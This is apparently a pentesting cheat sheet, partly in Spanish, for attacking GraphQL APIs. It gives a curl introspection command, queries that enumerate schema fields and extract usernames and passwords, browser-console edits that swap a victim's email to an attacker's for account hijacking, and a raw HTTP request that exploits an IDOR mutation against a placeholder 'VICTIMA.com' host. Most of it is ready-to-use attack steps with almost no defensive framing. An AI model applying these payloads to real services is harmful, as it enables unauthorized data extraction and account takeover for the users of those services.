Basic Exploit
On GraphQL you can use some basic attacks, with POST & JSON, or use Burpsuite
curl -s {web}/graphql -H "Content-Type: application/json" -d '{ "query": "{ __schema { types { name } } }" }' | jq .
You can copy the output and send it to the following website:
Exploring
If you found the name of a label, you can apply the following query, using as example "User" and field label named "name" with origin types
{ __type(name: "User") { name fields { name } } }
You can still go deeper.
{ user { username password } }
Otros casos
Secuestro de usuario
Puedes secuestrar a un usuario cambiando la informacion por consola via HTML, primero debes confirmar tu informacion en Inspeccionar > Consola
windows.RailsData.current_organization.business_email = "AttackerEmail"
windows.RailsData.user.email = "AttackerEmail"
Luego en un request interceptado por burp, al agregar miembros o al trabajar con correos, en POST lo cambias a la victima
Un sitio deberia verificar esto, no deberia dejar utilizar la cuenta victima.
IDOR
En este caso un atacante pudo descargar la informacion de cada CODE, esto permite generar un script para descargar toda la base.
POST /graphql HTTP/2
Host: VICTIMA.com
Content-Length: 388
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="98", "Google Chrome";v="98"
Accept: */*
X-Auth-Token: AUTHTOKEN
Content-Type: application/json
Origin: VICTIMA.com
Referer: VICTIMA.com/CODE/edit // Era en el sitio de "edicion"
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
{"operationName":"NombreOperacion","variables":{"structured_scope_id":"HASH-relacionado a /code/edit"},"query":"mutation NombreOperacion($structured_scope_id: ID!) {\n archiveStructuredScope(input: {structured_scope_id: $structured_scope_id}) {\n was_successful\n structured_scope {\n id\n archived_at\n __typename\n }\n __typename\n }\n}\n"}